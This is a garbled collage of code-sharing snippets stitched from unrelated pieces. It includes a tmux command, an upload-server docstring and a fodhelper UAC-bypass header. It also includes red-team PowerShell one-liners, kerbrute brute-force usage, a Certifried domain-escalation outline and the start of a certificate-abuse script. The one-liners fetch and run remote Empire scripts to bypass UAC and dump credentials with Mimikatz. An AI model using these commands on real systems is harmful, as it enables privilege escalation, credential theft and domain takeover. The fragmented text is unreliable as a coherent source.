start new:
tmux
start new with session name:
tmux new -s myname
#!/usr/bin/env python3 | |
"""Simple HTTP Server With Upload. | |
This module builds on BaseHTTPServer by implementing the standard GET | |
and HEAD requests in a fairly straightforward manner. | |
see: https://gist.github.com/UniIsland/3346170 | |
""" | |
<# | |
.SYNOPSIS | |
This script can bypass User Access Control (UAC) via fodhelper.exe | |
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts | |
an elevated command prompt. | |
.NOTES | |
Function : FodhelperUACBypass | |
File Name : FodhelperUACBypass.ps1 |
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:
#Thank you @NotMedic for troubleshooting/validating stuff! | |
$password = Read-Host -Prompt "Enter Password" | |
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
$CASERVER = "alexlab-dc01-ca" #CA name. | |
$CA = $CAFQDN + "\" + $CASERVER |